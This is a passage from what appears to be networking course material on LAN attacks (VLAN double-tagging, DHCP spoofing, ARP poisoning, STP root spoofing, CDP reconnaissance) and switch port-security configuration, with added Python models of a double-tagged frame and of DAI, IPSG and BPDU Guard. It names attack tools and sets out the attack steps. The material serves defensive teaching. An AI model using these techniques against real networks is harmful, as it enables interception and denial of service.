switch looks only at the inner 802.1Q tag that the threat actor inserted and sees that the frame is destined for
VLAN 20, the target VLAN. The second switch sends the frame on to the target or floods it, depending on
whether there is an existing MAC address table entry for the target.

A VLAN double-tagging attack is unidirectional and works only when the attacker is connected to a port
residing in the same VLAN as the native VLAN of the trunk port. The idea is that double tagging allows the
attacker to send data to hosts or servers on a VLAN that otherwise would be blocked by some type of access
control configuration. Presumably the return traffic will also be permitted, thus giving the attacker the ability to
communicate with devices on the normally blocked VLAN.

VLAN Attack Mitigation

VLAN hopping and VLAN double-tagging attacks can be prevented by implementing the following trunk
security guidelines, as discussed in a previous module:

• Disable trunking on all access ports.
• Disable auto trunking on trunk links so that trunks must be manually enabled.
• Be sure that the native VLAN is only used for trunk links.
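Added example (not from the course): a small Python model of how the two switches in steps 1 to 3 handle the 802.1Q tags, showing why the inner tag is exposed when the native VLAN is also used by access ports and why the last guideline above defeats it. The frame bytes, MAC addresses and VLAN numbers are constructed for the example.

```python
"""Constructed model of 802.1Q tag handling in the double-tagging attack
(10.5.3) and its mitigation. The two switches are reduced to the decisions
that matter: native-VLAN frames leave a trunk untagged, and trunk ingress
classifies a frame by the first tag it finds. The frame bytes, MAC addresses
and VLAN numbers below are made up, not captured traffic.
"""
import struct

TPID_8021Q = 0x8100  # EtherType value that announces an 802.1Q tag

# Frame as sent in step 1: outer tag VLAN 10 (the attacker's VLAN, equal to
# the trunk's native VLAN), inner tag VLAN 20 (the victim VLAN).
DOUBLE_TAGGED = bytes.fromhex(
    "00d0ba078499"  # destination MAC (constructed)
    "000af38e74b3"  # source MAC (constructed)
    "8100000a"      # outer 802.1Q tag: TPID 0x8100, PCP/DEI 0, VID 10
    "81000014"      # inner 802.1Q tag: TPID 0x8100, PCP/DEI 0, VID 20
    "0800"          # EtherType IPv4
    "deadbeef"      # stand-in payload
)


def parse_tags(frame: bytes):
    """Return (dst, src, [vlan ids outermost first], ethertype, payload)."""
    dst, src = frame[:6], frame[6:12]
    offset, vlans = 12, []
    while (offset + 4 <= len(frame)
           and struct.unpack("!H", frame[offset:offset + 2])[0] == TPID_8021Q):
        tci = struct.unpack("!H", frame[offset + 2:offset + 4])[0]
        vlans.append(tci & 0x0FFF)  # low 12 bits of the TCI are the VLAN ID
        offset += 4
    ethertype = struct.unpack("!H", frame[offset:offset + 2])[0]
    return dst, src, vlans, ethertype, frame[offset + 2:]


def first_switch_trunk_egress(frame: bytes, native_vlan: int) -> bytes:
    """Step 2: the frame is switched in the VLAN of its outer tag (the
    attacker's access VLAN) and leaves on the trunk. A frame in the native
    VLAN leaves untagged, so its 4-byte outer tag is removed; any other VLAN
    keeps its tag. Nothing looks past the first tag."""
    _, _, vlans, _, _ = parse_tags(frame)
    if vlans and vlans[0] == native_vlan:
        return frame[:12] + frame[16:]
    return frame


def second_switch_vlan(frame: bytes, native_vlan: int) -> int:
    """Step 3: on trunk ingress the first tag present decides the VLAN; an
    untagged frame is assigned to the native VLAN."""
    _, _, vlans, _, _ = parse_tags(frame)
    return vlans[0] if vlans else native_vlan


def delivered_vlan(frame: bytes, native_vlan: int) -> int:
    """VLAN in which the second switch finally forwards the frame."""
    on_trunk = first_switch_trunk_egress(frame, native_vlan)
    return second_switch_vlan(on_trunk, native_vlan)


def access_port_anomaly(frame: bytes) -> bool:
    """Detection hook: a host on an access port has no reason to send a frame
    carrying more than one 802.1Q tag, so such a frame is worth logging."""
    return len(parse_tags(frame)[2]) > 1


if __name__ == "__main__":
    # Native VLAN 10 is also an access VLAN: the inner tag is exposed.
    print("native VLAN 10  -> delivered in VLAN", delivered_vlan(DOUBLE_TAGGED, 10))
    # Mitigation from the guidelines above: a native VLAN used by no access
    # port. The outer tag stays on the trunk and VLAN 20 is never reached.
    print("native VLAN 999 -> delivered in VLAN", delivered_vlan(DOUBLE_TAGGED, 999))
    print("double tag seen on access port:", access_port_anomaly(DOUBLE_TAGGED))
```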

10.5.4 DHCP Messages

DHCP servers dynamically provide IP configuration information including IP address, subnet mask, default
gateway, DNS servers, and more to clients. A review of the sequence of the DHCP message exchange
between client and server is shown in the figure.

10.5.5 DHCP Attacks

Two types of DHCP attacks are DHCP starvation and DHCP spoofing. Both attacks are mitigated by
implementing DHCP snooping.

DHCP Starvation Attack

The goal of the DHCP Starvation attack is to create a DoS for connecting clients. DHCP starvation attacks
require an attack tool such as Gobbler.

Gobbler has the ability to look at the entire scope of leasable IP addresses and tries to lease them all.
Specifically, it creates DHCP discovery messages with bogus MAC addresses.

DHCP Spoofing Attack

A DHCP spoofing attack occurs when a rogue DHCP server is connected to the network and provides false IP
configuration parameters to legitimate clients. A rogue server can provide a variety of misleading information:

• Wrong default gateway - The rogue server provides an invalid gateway or the IP address of its host to
create a man-in-the-middle attack. This may go entirely undetected as the intruder intercepts the data flow
through the network.
• Wrong DNS server - The rogue server provides an incorrect DNS server address pointing the user to a
nefarious website.
• Wrong IP address - The rogue server provides an invalid IP address effectively creating a DoS attack on
the DHCP client.

Explanation of a DHCP spoofing attack.

Step 1 Threat Actor Connects Rogue DHCP Server

A threat actor successfully connects a rogue DHCP server to a switch port on the same subnet and VLANs as
the target clients. The goal of the rogue server is to provide clients with false IP configuration information.

Step 2 Client Broadcasts DHCP Discovery Messages

A legitimate client connects to the network and requires IP configuration parameters. Therefore, the client
broadcasts a DHCP Discovery request looking for a response from a DHCP server. Both servers will receive
the message and respond.

Step 3 Legitimate and Rogue DHCP Reply

The legitimate DHCP server responds with valid IP configuration parameters. However, the rogue server also
responds with a DHCP offer containing IP configuration parameters defined by the threat actor. The client will
reply to the first offer received.

The network topology consists of two multilayer switches connected to two LAN switches. A legitimate DHCP
server is connected to one of the multilayer switches. A DHCP client is connected to one of the LAN
switches. A rogue DHCP server is connected to the other LAN switch. A DHCP offer message is sent by both
DHCP servers to the DHCP client.

Step 4 Client Accepts Rogue DHCP Offer

The rogue offer was received first, and therefore, the client broadcasts a DHCP request accepting the IP
parameters defined by the threat actor. The legitimate and rogue server will receive the request.

Step 5 Rogue Server Acknowledges

The rogue server unicasts a reply to the client to acknowledge its request. The legitimate server will cease
communicating with the client.

10.5.6 Video – ARP Attacks, STP Attacks, and CDP Reconnaissance

10.5.7 ARP Attacks

Recall that hosts broadcast ARP Requests to determine the MAC address of a host with a particular IPv4
address. This is typically done to discover the MAC address of the default gateway. All hosts on the subnet
receive and process the ARP Request. The host with the matching IPv4 address in the ARP Request sends
an ARP Reply.

According to the ARP RFC, a client is allowed to send an unsolicited ARP Request called a “gratuitous ARP.”
When a host sends a gratuitous ARP, other hosts on the subnet store the MAC address and IPv4 address
contained in the gratuitous ARP in their ARP tables.

The problem is that an attacker can send a gratuitous ARP message containing a spoofed MAC address to a
switch, and the switch would update its MAC table accordingly. Therefore, any host can claim to be the owner
of any IP and MAC address combination they choose. In a typical attack, a threat actor can send unsolicited
ARP Replies to other hosts on the subnet with the MAC Address of the threat actor and the IPv4 address of
the default gateway.

There are many tools available on the internet to create ARP man-in-the-middle attacks including dsniff, Cain
& Abel, ettercap, Yersinia, and others. IPv6 uses the ICMPv6 Neighbor Discovery Protocol for Layer 2 address
resolution. IPv6 includes strategies to mitigate Neighbor Advertisement spoofing, similar to the mitigations for
spoofed ARP Replies in IPv4 networks.

ARP spoofing and ARP poisoning are mitigated by implementing DAI.

Explanation of ARP spoofing and ARP poisoning

Step 1 Normal State with Converged MAC Tables

Each device has an accurate MAC table with the correct IPv4 and MAC addresses for the other devices on
the LAN.

Step 2 ARP Spoofing Attack

The threat actor sends two spoofed gratuitous ARP Replies in an attempt to replace R1 as the default
gateway:

1. The first one informs all devices on the LAN that the threat actor’s MAC address ([Link]) maps to R1’s
IPv4 address, [Link].
2. The second one informs all devices on the LAN that the threat actor’s MAC address ([Link]) maps to
PC1’s IPv4 address, [Link].

Step 3 ARP Poisoning Attack with Man-in-the-Middle Attack

R1 and PC1 remove the correct entry for each other’s MAC address and replace it with PC2’s MAC address.
The threat actor has now poisoned the ARP caches of all devices on the subnet. ARP poisoning leads to
various man-in-the-middle attacks, posing a serious security threat to the network.

10.5.8 Address Spoofing Attack

IP addresses and MAC addresses can be spoofed for a variety of reasons. IP address spoofing is when a
threat actor hijacks a valid IP address of another device on the subnet, or uses a random IP address. IP
address spoofing is difficult to mitigate, especially when it is used inside a subnet in which the IP belongs.

MAC address spoofing attacks occur when the threat actors alter the MAC address of their host to match
another known MAC address of a target host. The attacking host then sends a frame throughout the network
with the newly-configured MAC address. When the switch receives the frame, it examines the source MAC
address. The switch overwrites the current MAC table entry and assigns the MAC address to the new port, as
shown in the figure. It then inadvertently forwards frames destined for the target host to the attacking host.

When the target host sends traffic, the switch will correct the error, realigning the MAC address to the original
port. To stop the switch from returning the port assignment to its correct state, the threat actor can create a
program or script that will constantly send frames to the switch so that the switch maintains the incorrect or
spoofed information. There is no security mechanism at Layer 2 that allows a switch to verify the source of
MAC addresses, which is what makes it so vulnerable to spoofing.

IP and MAC address spoofing can be mitigated by implementing IPSG.
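The two mitigations named in 10.5.7 and 10.5.8, DAI and IPSG, both work by checking traffic on untrusted ports against the DHCP snooping binding table. The following Python model is an added example and not course material: the binding table, the port names, the 192.0.2.0/24 addresses and the locally administered MAC addresses are constructed, and the checks are a simplified version of what the switch does (trusted ports are not inspected; on untrusted ports the sender's IP/MAC pair must appear in a binding for that port and VLAN).

```python
# Added example (not from the course): how DAI and IPSG consult the DHCP
# snooping binding table.  Bindings, ports and packets are constructed
# sample data; 192.0.2.0/24 is a documentation address range.
from dataclasses import dataclass


@dataclass(frozen=True)
class Binding:
    """One DHCP snooping binding: the IP/MAC pair that is legitimate on a port."""
    ip: str
    mac: str
    vlan: int
    port: str


@dataclass(frozen=True)
class ArpPacket:
    port: str          # ingress switch port
    vlan: int
    sender_ip: str
    sender_mac: str


@dataclass(frozen=True)
class IpPacket:
    port: str
    vlan: int
    src_ip: str
    src_mac: str


class SnoopingTable:
    def __init__(self, bindings, trusted_ports):
        self.bindings = list(bindings)
        self.trusted = set(trusted_ports)   # uplinks towards the DHCP server / router

    def matches(self, port, vlan, ip, mac=None):
        """True if a binding on this port and VLAN has this IP (and this MAC, if given)."""
        for b in self.bindings:
            if b.port == port and b.vlan == vlan and b.ip == ip:
                if mac is None or b.mac == mac:
                    return True
        return False


def dai_check(table, pkt):
    """Dynamic ARP Inspection (simplified): ARP on trusted ports is forwarded
    unchecked; on untrusted ports the sender IP/MAC pair must be in the
    binding table for that port and VLAN, otherwise the ARP packet is dropped."""
    if pkt.port in table.trusted:
        return "forward"
    if table.matches(pkt.port, pkt.vlan, pkt.sender_ip, pkt.sender_mac):
        return "forward"
    return "drop"


def ipsg_check(table, pkt, check_mac=False):
    """IP Source Guard (simplified): IP packets on an untrusted port are
    forwarded only if the source IP (and, when combined with port security,
    the source MAC) matches a binding on that port; anything else is dropped."""
    if pkt.port in table.trusted:
        return "forward"
    mac = pkt.src_mac if check_mac else None
    return "forward" if table.matches(pkt.port, pkt.vlan, pkt.src_ip, mac) else "drop"


def run_scenario():
    """Constructed scenario: PC2 on Fa0/2 tries the ARP poisoning from 10.5.7
    and the address spoofing from 10.5.8 while DAI and IPSG are active."""
    table = SnoopingTable(
        bindings=[Binding("192.0.2.10", "0200.0000.0001", 1, "Fa0/1"),    # PC1
                  Binding("192.0.2.20", "0200.0000.0002", 1, "Fa0/2")],   # PC2
        trusted_ports={"Fa0/24"})                                        # uplink to R1
    gw_ip, gw_mac = "192.0.2.1", "0200.0000.00ff"
    arp = [
        ArpPacket("Fa0/1", 1, "192.0.2.10", "0200.0000.0001"),   # PC1, legitimate
        ArpPacket("Fa0/24", 1, gw_ip, gw_mac),                   # R1 on the trusted uplink
        ArpPacket("Fa0/2", 1, gw_ip, "0200.0000.0002"),          # PC2 claiming R1's IP
        ArpPacket("Fa0/2", 1, "192.0.2.10", "0200.0000.0002"),   # PC2 claiming PC1's IP
    ]
    ip = [
        IpPacket("Fa0/2", 1, "192.0.2.20", "0200.0000.0002"),    # PC2, legitimate
        IpPacket("Fa0/2", 1, "192.0.2.10", "0200.0000.0002"),    # PC2 hijacking PC1's IP
        IpPacket("Fa0/2", 1, "192.0.2.20", "0200.0000.0001"),    # PC2 spoofing PC1's MAC
    ]
    return ([dai_check(table, p) for p in arp],
            [ipsg_check(table, p, check_mac=True) for p in ip])


if __name__ == "__main__":
    print(run_scenario())
```

The gratuitous ARP Replies from Step 2 above are dropped because the sender IP/MAC pairs do not exist in any binding for Fa0/2, so R1 and PC1 never see them and their ARP caches stay correct. IPSG in IP-only mode would still forward the third IP packet (the source IP is valid for the port), which is why the MAC check is only available when IPSG is combined with port security.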

10.5.9 STP Attack

Network attackers can manipulate the Spanning Tree Protocol (STP) to conduct an attack by spoofing the root
bridge and changing the topology of a network. Attackers can make their hosts appear as root bridges; and
therefore, capture all traffic for the immediate switched domain.

To conduct an STP manipulation attack, the attacking host broadcasts STP bridge protocol data units
(BPDUs) containing configuration and topology changes that will force spanning-tree recalculations, as shown
in the figure. The BPDUs sent by the attacking host announce a lower bridge priority in an attempt to be
elected as the root bridge.

Note: These issues can occur when someone adds an Ethernet switch to the network without any malicious
intent.

If successful, the attacking host becomes the root bridge, as shown in the figure, and can now capture a
variety of frames that would otherwise not be accessible.

This STP attack is mitigated by implementing BPDU Guard on all access ports. BPDU Guard is discussed in
more detail later in the course.
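The election described above and the effect of BPDU Guard, as an added Python example that is not part of the course. The bridge names, priorities, MAC addresses and port assignments are constructed; the model only covers the root election (lowest priority, then lowest MAC wins) and the rule that a BPDU received on a BPDU Guard access port err-disables that port instead of taking part in the election.

```python
# Added example (not from the course): root-bridge election from received
# BPDUs and what BPDU Guard on access ports changes.  All bridge IDs,
# priorities and port names are constructed.
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Bridge:
    name: str
    priority: int                        # 0-61440 in steps of 4096; default 32768
    mac: str                             # tie-breaker, lowest wins
    ingress_port: Optional[str] = None   # port the BPDU arrived on; None = this switch


def bridge_id(b):
    """STP compares the priority first, then the bridge MAC; lower wins."""
    return (b.priority, b.mac)


def elect_root(local, bpdus, access_ports, bpdu_guard):
    """Return (root bridge, err-disabled ports).  With BPDU Guard, a BPDU
    arriving on an access (PortFast) port err-disables that port and the
    BPDU is never considered in the election."""
    errdisabled = []
    candidates = [local]
    for b in bpdus:
        if bpdu_guard and b.ingress_port in access_ports:
            errdisabled.append(b.ingress_port)
            continue
        candidates.append(b)
    return min(candidates, key=bridge_id), errdisabled


def scenario(bpdu_guard):
    """S1 hears the intended root on its trunk and a host announcing priority 0
    on an access port; returns (root name, err-disabled ports)."""
    s1 = Bridge("S1", 32768, "0200.0000.0011")
    bpdus = [
        Bridge("S0", 24576, "0200.0000.0001", ingress_port="Fa0/24"),  # intended root, via trunk
        Bridge("rogue", 0, "0200.0000.00aa", ingress_port="Fa0/5"),     # host on an access port
    ]
    root, err = elect_root(s1, bpdus, access_ports={"Fa0/1", "Fa0/5"},
                           bpdu_guard=bpdu_guard)
    return root.name, err


if __name__ == "__main__":
    print("without BPDU Guard:", scenario(False))
    print("with BPDU Guard:   ", scenario(True))
```

Without BPDU Guard the priority-0 announcement wins the election, which is exactly the topology change the text describes; with BPDU Guard the access port is err-disabled the moment the BPDU arrives, and the intended root is unaffected. The same behaviour covers the non-malicious case in the note above (an unmanaged switch plugged into an access port).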

10.5.10 CDP Reconnaissance

The Cisco Discovery Protocol (CDP) is a proprietary Layer 2 link discovery protocol. It is enabled on all Cisco
devices by default. CDP can automatically discover other CDP-enabled devices and help auto-configure
their connection. Network administrators also use CDP to help configure and troubleshoot network devices.

CDP information is sent out CDP-enabled ports in a periodic, unencrypted multicast. CDP information
includes the IP address of the device, IOS software version, platform, capabilities, and the native VLAN.
The device receiving the CDP message updates its CDP database.

CDP information is extremely useful in network troubleshooting. For example, CDP can be used to verify
Layer 1 and 2 connectivity. If an administrator cannot ping a directly connected interface, but still receives
CDP information, then the problem is most likely related to the Layer 3 configuration.

However, the information provided by CDP can also be used by a threat actor to discover network
infrastructure vulnerabilities.

In the figure, a sample Wireshark capture displays the contents of a CDP packet. The attacker is able to
identify the Cisco IOS software version used by the device. This allows the attacker to determine whether
there were any security vulnerabilities specific to that particular version of IOS.

CDP broadcasts are sent unencrypted and unauthenticated. Therefore, an attacker could interfere with the
network infrastructure by sending crafted CDP frames containing bogus device information to
directly-connected Cisco devices.

To mitigate the exploitation of CDP, limit the use of CDP on devices or ports. For example, disable CDP on
edge ports that connect to untrusted devices.

To disable CDP globally on a device, use the no cdp run global configuration mode command. To enable
CDP globally, use the cdp run global configuration command.

To disable CDP on a port, use the no cdp enable interface configuration command. To enable CDP on a port,
use the cdp enable interface configuration command.

Note: Link Layer Discovery Protocol (LLDP) is also vulnerable to reconnaissance attacks. Configure no lldp
run to disable LLDP globally. To disable LLDP on the interface, configure no lldp transmit and no lldp
receive.

10.5.11 Check Your Understanding – LAN Attacks

10.6 Module Practice and Quiz

10.6.1 What did I learn in this module?

Endpoints are particularly susceptible to malware-related attacks that originate through email or web browsing,
such as DDoS, data breaches, and malware. These endpoints have typically used traditional host-based
security features, such as antivirus/antimalware, host-based firewalls, and Host-based intrusion prevention
systems (HIPSs). Endpoints are best protected by a combination of NAC, host-based AMP software, an
email security appliance (ESA), and a web security appliance (WSA). Cisco WSA can perform blacklisting of
URLs, URL-filtering, malware scanning, URL categorization, Web application filtering, and encryption and
decryption of web traffic.

AAA controls who is permitted to access a network (authenticate), what they can do while they are there
(authorize), and to audit what actions they performed while accessing the network (accounting). Authorization
uses a set of attributes that describes the user’s access to the network. Accounting is combined with AAA
authentication. The AAA server keeps a detailed log of exactly what the authenticated user does on the
device. The IEEE 802.1X standard is a port-based access control and authentication protocol that restricts
unauthorized workstations from connecting to a LAN through publicly accessible switch ports.

If Layer 2 is compromised, then all layers above it are also affected. The first step in mitigating attacks on the
Layer 2 infrastructure is to understand the underlying operation of Layer 2 and the Layer 2 solutions: Port
Security, DHCP Snooping, DAI, and IPSG. These won’t work unless management protocols are secured.

MAC address flooding attacks bombard the switch with fake source MAC addresses until the switch MAC
address table is full. At this point, the switch treats the frame as an unknown unicast and begins to flood all
incoming traffic out all ports on the same VLAN without referencing the MAC table. The threat actor can now
capture all of the frames sent from one host to another on the local LAN or local VLAN. The threat actor
uses macof to rapidly generate many random source and destination MAC and IP addresses. To mitigate MAC table
overflow attacks, network administrators must implement port security.

A VLAN hopping attack enables traffic from one VLAN to be seen by another VLAN without the aid of a
router. The threat actor configures a host to act like a switch to take advantage of the automatic trunking
port feature enabled by default on most switch ports.

A VLAN double-tagging attack is unidirectional and works only when the threat actor is connected to a port
residing in the same VLAN as the native VLAN of the trunk port. Double tagging allows the threat actor to
send data to hosts or servers on a VLAN that otherwise would be blocked by some type of access control
configuration. Return traffic will also be permitted, letting the threat actor communicate with devices on the
normally blocked VLAN.

VLAN hopping and VLAN double-tagging attacks can be prevented by implementing the following trunk
security guidelines:

• Disable trunking on all access ports.
• Disable auto trunking on trunk links so that trunks must be manually enabled.
• Be sure that the native VLAN is only used for trunk links.

DHCP Attack: DHCP servers dynamically provide IP configuration information including IP address, subnet
mask, default gateway, DNS servers, and more to clients. Two types of DHCP attacks are DHCP starvation
and DHCP spoofing. Both attacks are mitigated by implementing DHCP snooping.

ARP Attack: A threat actor sends a gratuitous ARP message containing a spoofed MAC address to a switch,
and the switch updates its MAC table accordingly. Now the threat actor sends unsolicited ARP Requests to
other hosts on the subnet with the MAC Address of the threat actor and the IP address of the default gateway.
ARP spoofing and ARP poisoning are mitigated by implementing DAI.

Address Spoofing Attack: IP address spoofing is when a threat actor hijacks a valid IP address of another
device on the subnet or uses a random IP address. MAC address spoofing attacks occur when the threat
actors alter the MAC address of their host to match another known MAC address of a target host. IP and MAC
address spoofing can be mitigated by implementing IPSG.

STP Attack: Threat actors manipulate STP to conduct an attack by spoofing the root bridge and changing the
topology of a network. Threat actors make their hosts appear as root bridges; therefore, capturing all traffic for
the immediate switched domain. This STP attack is mitigated by implementing BPDU Guard on all access
ports.

CDP Reconnaissance: CDP information is sent out CDP-enabled ports in a periodic, unencrypted multicast.
CDP information includes the IP address of the device, IOS software version, platform, capabilities, and the
native VLAN. The device receiving the CDP message updates its CDP database. The information provided by
CDP can also be used by a threat actor to discover network infrastructure vulnerabilities. To mitigate the
exploitation of CDP, limit the use of CDP on devices or ports.

10.6.2 Module Quiz – LAN Security Concepts

11 Switch Security Configuration

11.0.1 Why Should I take this module?

Welcome to Switch Security Configuration!

An important part of your responsibility as a network professional is to keep the network secure. Most of the
time we only think about security attacks coming from outside the network, but threats can come from within
the network as well. These threats can range anywhere from an employee innocently adding an Ethernet
switch to the corporate network so they can have more ports, to malicious attacks caused by a disgruntled
employee. It is your job to keep the network safe and to ensure that business operations continue
uncompromised.

How do we keep the network safe and stable? How do we protect it from malicious attacks from within the
network? How do we make sure employees are not adding switches, servers and other devices to the network
that might compromise network operations?

This module is your introduction to keeping your network secure from within!

11.0.2 What Will I learn in this module?

Module Title: Switch Security Configuration


Module Objective: Configure switch security to mitigate LAN attacks.

Topic Title              Topic Objective
Implement Port Security  Implement port security to mitigate MAC address table attacks.
Mitigate VLAN Attacks    Explain how to configure DTP (Dynamic Trunking Protocol) and native VLAN to mitigate VLAN attacks.
Mitigate DHCP Attacks    Explain how to configure DHCP snooping to mitigate DHCP attacks.
Mitigate ARP Attacks     Explain how to configure ARP inspection to mitigate ARP attacks.
Mitigate STP Attacks     Explain how to configure PortFast and BPDU Guard to mitigate STP attacks.

11.1 Implement Port Security

11.1.1 Secure unused ports

Layer 2 devices are considered to be the weakest link in a company’s security infrastructure. Layer 2 attacks
are some of the easiest for hackers to deploy but these threats can also be mitigated with some common
Layer 2 solutions.

All switch ports (interfaces) should be secured before the switch is deployed for production use. How a port is
secured depends on its function.
A simple method that many administrators use to help secure the network from unauthorized access is to
disable all unused ports on a switch. For example, if a Catalyst 2960 switch has 24 ports and there are three
Fast Ethernet connections in use, it is good practice to disable the 21 unused ports. Navigate to each unused
port and issue the Cisco IOS shutdown command. If a port must be reactivated at a later time, it can be
enabled with the no shutdown command.
To configure a range of ports, use the interface range command.

Switch(config)# interface range type module/first-number – last-number

For example, to shut down ports Fa0/8 through Fa0/24 on S1, you would enter the following commands.

S1(config)# interface range fa0/8 - 24
S1(config-if-range)# shutdown
%LINK-5-CHANGED: Interface FastEthernet0/8, changed state to administratively
down
(output omitted)
%LINK-5-CHANGED: Interface FastEthernet0/24, changed state to administratively
down
S1(config-if-range)#

11.1.2 Mitigate MAC Address Table Attacks

The simplest and most effective method to prevent MAC address table overflow attacks is to enable port
security.
Port security limits the number of valid MAC addresses allowed on a port. It allows an administrator to
manually configure MAC addresses for a port or to permit the switch to dynamically learn a limited number of
MAC addresses. When a port configured with port security receives a frame, the source MAC address of the
frame is compared to the list of secure source MAC addresses that were manually configured or dynamically
learned on the port.
By limiting the number of permitted MAC addresses on a port to one, port security can be used to control
unauthorized access to the network, as shown in the figure.

Note: MAC address is shown as 24 bits for simplicity.

11.1.3 Enable Port Security

Notice in the example, the switchport port-security command was rejected. This is because port security can
only be configured on manually configured access ports or manually configured trunk ports. By default, Layer
2 switch ports are set to dynamic auto (trunking on). Therefore, in the example, the port is configured with
the switchport mode access interface configuration command.
Note: Trunk port security is beyond the scope of this course.

S1(config)# interface f0/1
S1(config-if)# switchport port-security
Command rejected: FastEthernet0/1 is a dynamic port.
S1(config-if)# switchport mode access
S1(config-if)# switchport port-security
S1(config-if)# end
S1#

Use the show port-security interface command to display the current port security settings for FastEthernet
0/1, as shown in the example. Notice how port security is enabled, port status is Secure-down which means
there are no devices attached and no violation has occurred, the violation mode is Shutdown, and how the
maximum number of MAC addresses is 1. If a device is connected to the port, the switch port status would
display Secure-up and the switch will automatically add the device’s MAC address as a secure MAC. In this
example, no device is connected to the port.

S1# show port-security interface f0/1
Port Security : Enabled
Port Status : Secure-down
Violation Mode : Shutdown
Aging Time : 0 mins
Aging Type : Absolute
SecureStatic Address Aging : Disabled
Maximum MAC Addresses : 1
Total MAC Addresses : 0
Configured MAC Addresses : 0
Sticky MAC Addresses : 0
Last Source Address:Vlan : 0000.0000.0000:0
Security Violation Count : 0
S1#

Note: If an active port is configured with the switchport port-security command and more than one device is
connected to that port, the port will transition to the error-disabled state. This condition is discussed later in
this topic.

After port security is enabled, other port security specifics can be configured, as shown in the example.

11.1.4 Limit and Learn MAC Addresses

To set the maximum number of MAC addresses allowed on a port, use the following command:

Switch(config-if)# switchport port-security maximum value

The default port security value is 1. The maximum number of secure MAC addresses that can be configured
depends on the switch and the IOS. In this example, the maximum is 8192.

S1(config)# interface f0/1
S1(config-if)# switchport port-security maximum ?
<1-8192> Maximum addresses
S1(config-if)# switchport port-security maximum

The switch can be configured to learn about MAC addresses on a secure port in one of three ways:

1. Manually Configured

The administrator manually configures static MAC addresses by using the following command once for each
secure MAC address on the port:

Switch(config-if)# switchport port-security mac-address mac-address

2. Dynamically Learned

When the switchport port-security command is entered, the current source MAC for the device connected to
the port is automatically secured but is not added to the startup configuration. If the switch is rebooted, the
port will have to re-learn the device’s MAC address.

3. Dynamically Learned – Sticky

The administrator can enable the switch to dynamically learn MAC addresses and “stick” them to the running
configuration by using the following command:

Switch(config-if)# switchport port-security mac-address sticky

Saving the running configuration will commit the dynamically learned MAC address to NVRAM.

The following example demonstrates a complete port security configuration for FastEthernet 0/1 with a host
connected to port Fa0/1. The administrator specifies a maximum of 2 MAC addresses, manually configures
one secure MAC address, and then configures the port to dynamically learn additional secure MAC addresses
up to the 2 secure MAC address maximum. Use the show port-security interface and the
show port-security address commands to verify the configuration.

*Mar 1 [Link].179: %LINK-3-UPDOWN: Interface FastEthernet0/1, changed state to
up
*Mar 1 [Link].194: %LINEPROTO-5-UPDOWN: Line protocol on Interface
FastEthernet0/1, changed state to up
S1#conf t
Enter configuration commands, one per line. End with CNTL/Z.
S1(config)#
S1(config)# interface fa0/1
S1(config-if)# switchport mode access
S1(config-if)# switchport port-security
S1(config-if)# switchport port-security maximum 2
S1(config-if)# switchport port-security mac-address [Link].1234
S1(config-if)# switchport port-security mac-address sticky
S1(config-if)# end
S1# show port-security interface fa0/1
Port Security : Enabled
Port Status : Secure-up
Violation Mode : Shutdown
Aging Time : 0 mins
Aging Type : Absolute
SecureStatic Address Aging : Disabled
Maximum MAC Addresses : 2
Total MAC Addresses : 2
Configured MAC Addresses : 1
Sticky MAC Addresses : 1
Last Source Address:Vlan : a41f.7272.676a:1
Security Violation Count : 0
S1# show port-security address
Secure Mac Address Table
-----------------------------------------------------------------------------
Vlan Mac Address Type Ports Remaining Age
(mins)
---- ----------- ---- ----- -------------
1 a41f.7272.676a SecureSticky Fa0/1 -
1 [Link].1234 SecureConfigured Fa0/1 -
-----------------------------------------------------------------------------
Total Addresses in System (excluding one mac per port) : 1
Max Addresses limit in System (excluding one mac per port) : 8192
S1#

The output of the show port-security interface command verifies that port security is enabled, there is a host
connected to the port (i.e., Secure-up), a total of 2 MAC addresses will be allowed, and S1 has learned one
MAC address statically and one MAC address dynamically (i.e., sticky).

The output of the show port-security address command lists the two learned MAC addresses.

11.1.5 Port Security Aging

Port security aging can be used to set the aging time for static and dynamic secure addresses on a port. Two
types of aging are supported per port:

> Absolute - The secure addresses on the port are deleted after the specified aging time.
> Inactivity - The secure addresses on the port are deleted only if they are inactive for the specified aging
time.

Use aging to remove secure MAC addresses on a secure port without manually deleting the existing secure
MAC addresses. Aging time limits can also be increased to ensure past secure MAC addresses remain, even
while new MAC addresses are added. Aging of statically configured secure addresses can be enabled or
disabled on a per-port basis.

Use the switchport port-security aging command to enable or disable static aging for the secure port, or to
set the aging time or type.

Switch(config-if)# switchport port-security aging { static | time time | type {absolute | inactivity}}

The parameters for the command are described in the table.

Parameter        Description
static           Enable aging for statically configured secure addresses on this port.
time time        Specify the aging time for this port. The range is 0 to 1440 minutes. If the time is 0, aging is disabled for this port.
type absolute    Set the absolute aging time. All the secure addresses on this port age out exactly after the time (in minutes) specified and are removed from the secure address list.
type inactivity  Set the inactivity aging type. The secure addresses on this port age out only if there is no data traffic from the secure source address for the specified time period.

Note: MAC addresses are shown as 24 bits for simplicity.

The example shows an administrator configuring an aging time of 10 minutes with the inactivity aging type, and
then using the show port-security interface command to verify the configuration.

S1(config)# interface fa0/1
S1(config-if)# switchport port-security aging time 10
S1(config-if)# switchport port-security aging type inactivity
S1(config-if)# end
S1# show port-security interface fa0/1
Port Security : Enabled
Port Status : Secure-up
Violation Mode : Shutdown
Aging Time : 10 mins
Aging Type : Inactivity
SecureStatic Address Aging : Disabled
Maximum MAC Addresses : 2
Total MAC Addresses : 2
Configured MAC Addresses : 1
Sticky MAC Addresses : 1
Last Source Address:Vlan : a41f.7272.676a:1
Security Violation Count : 0
S1#

11.1.6 Port Security Violation Modes

If the MAC address of a device attached to the port differs from the list of secure addresses, then a port
violation occurs. By default, the port enters the error-disabled state.

To set the port security violation mode, use the following command:

Switch(config-if)# switchport port-security violation { protect | restrict | shutdown}

The following tables show how a switch reacts based on the configured violation mode.

Security Violation Mode Descriptions

Mode                Description
shutdown (default)  The port transitions to the error-disabled state immediately, turns off the port LED, and sends a syslog message. It increments the violation counter. When a secure port is in the error-disabled state, an administrator must re-enable it by entering the shutdown and no shutdown commands.
restrict            The port drops packets with unknown source addresses until you remove a sufficient number of secure MAC addresses to drop below the maximum value or increase the maximum value. This mode causes the Security Violation counter to increment and generates a syslog message.
protect             This is the least secure of the security violation modes. The port drops packets with unknown MAC source addresses until you remove a sufficient number of secure MAC addresses to drop below the maximum value or increase the maximum value. No syslog message is sent.

Security Violation Mode Comparison

Violation Mode  Discards Offending Traffic  Sends Syslog Message  Increase Violation Counter  Shuts Down Port
